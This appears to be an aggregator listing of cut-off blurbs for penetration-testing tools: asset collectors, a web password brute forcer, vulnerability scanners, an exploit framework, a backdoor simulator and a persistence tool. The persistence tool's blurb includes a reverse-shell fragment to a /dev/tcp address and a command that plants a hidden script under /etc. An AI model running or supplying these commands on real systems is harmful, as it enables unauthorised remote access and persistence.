快速筛选Enscan输出结果中的domain，让你在红蓝攻防中快人一步声明个人感觉吧，直接Enscan导出大批量资产失败率太高了，所以干脆写个脚本，实测跑1500+个资产没问题。脚本主要实现功能是和Enscan功能重复的，所以这个脚本的使用看个人喜好，有问题和建议可以提Issues，共同完善这个懒狗脚本。脚本用于安全渗透测试，请勿用于非法渗透测试。环境配置首先下载enscan到本地，生成配置文件，…

?I'mBoom??Boom简介Boom是一款基于无头浏览器的Web弱口令爆破工具。它具有以下特性：自动识别网页是否是登录页面自动识别爆破目标类型：表单/传统认证协议类型(Basic/Digest/NTLM)自动识别登录相关组件并填充点击自动判别登录成功与否支持URL批量并发爆破支持单URL并发爆破多种爆破模式：密码优先和用户名优先WebHook消息推送[]支持验证码组件识别✨Demo?快速使用在…

Windows10PenetrationSuiteToolkitwithinKaliLinuxv5.02024.4.17更新说明:安卓、CTF、逆向、AI、取证、数据库等分类补充了部分实用工具；去除部分长期未更新、使用效果不佳及功能重复的工具；优化扫描器、数据库等部分工具系统资源占用过大问题；重构工具快捷方式，注明详细使用参数及方法，图标美化；系统、组件及工具常规升级更新。系统简介:基于Windo…

希望大家有好的idea,可以提issue,我会尽量实现目前功能fastjson扫描权限绕过扫描未授权检测扫描sql注入检测多层级路由扫描工具调用log4j检测复杂数据提交一键生成nuclei模板使用说明请使用mvncleanpackage进行编译打包,生成的jar包在target/目录下请使用mvncleanpackage进行编译打包,生成的jar包在target/目录下请使用mvncleanpa…

Vulnerabilityaccuratedetectionanddeepexploitframework0x01简介woodpecker-framework是一款漏洞精准检测深度利用框架，只做一件事：精准狙击高危漏洞。针对人群：专业打点人士。目标探测精准检测深度利用荷载生成0x02注意2.1在MacosJDK11.11版本下运行，切换输入法会崩溃这个问题不是woodpecker框架的问题，是该版…

?HackerPermKeeper黑客权限保持者___________|||||||__\||//||__||______||________||__)|___________|'/_______________|__|/_`|/__||//_\'__|___/_\'__|'_`_\|&/dev/tcp/192.168.86.137/34340>&1chmod+x/etc/.111.sh2、添加定…

BackdoorSimOverviewBackdoorSimisaremoteadministrationandmonitoringtooldesignedforeducationalandtestingpurposes.Itconsistsoftwomaincomponents:ControlServerandBackdoorClient.Theservercontrolstheclient,a…

IEyes企业资产快速收集工具本工具主要通过天眼查接口进行快速的资产收集，收集内容包括备案域名、公众号、APP，以及其子公司，投资公司的信息，支持递归深度搜索子公司在查询企业子公司时主要分为4类企业单位场景，除了4以外整体我都简化一并查询中小企业，集团公司，这类公司有自己的子公司，子公司也是我们收集的范围大型厂商，比如腾讯阿里这类，这类公司主要以投资的形式拥有着一大批子公司，投资比例越高越和母公司…

Modern.Native.WebDebuggingProxyformacOS.SupportsiOSandAndroid⚡️Features?NativemacOSapp.WrittenbySwift,Objective-C.PoweredbyAppleSwiftNIOforthehigh-performancenetworkapplication.?FullysupportsAppleChip…

✈️一、工具概述SBSCAN：（spring框架渗透，这一个工具就够了，如果工具对你有用，快点个star?吧）SBSCAN是一款专注于spring框架的渗透测试工具，可以对指定站点进行springboot未授权扫描/敏感信息扫描以及进行spring相关漏洞的扫描与验证。最全的敏感路径字典：最全的springboot站点敏感路径字典，帮你全面检测站点是否存在敏感信息泄漏支持指纹检测：检测是否为spr…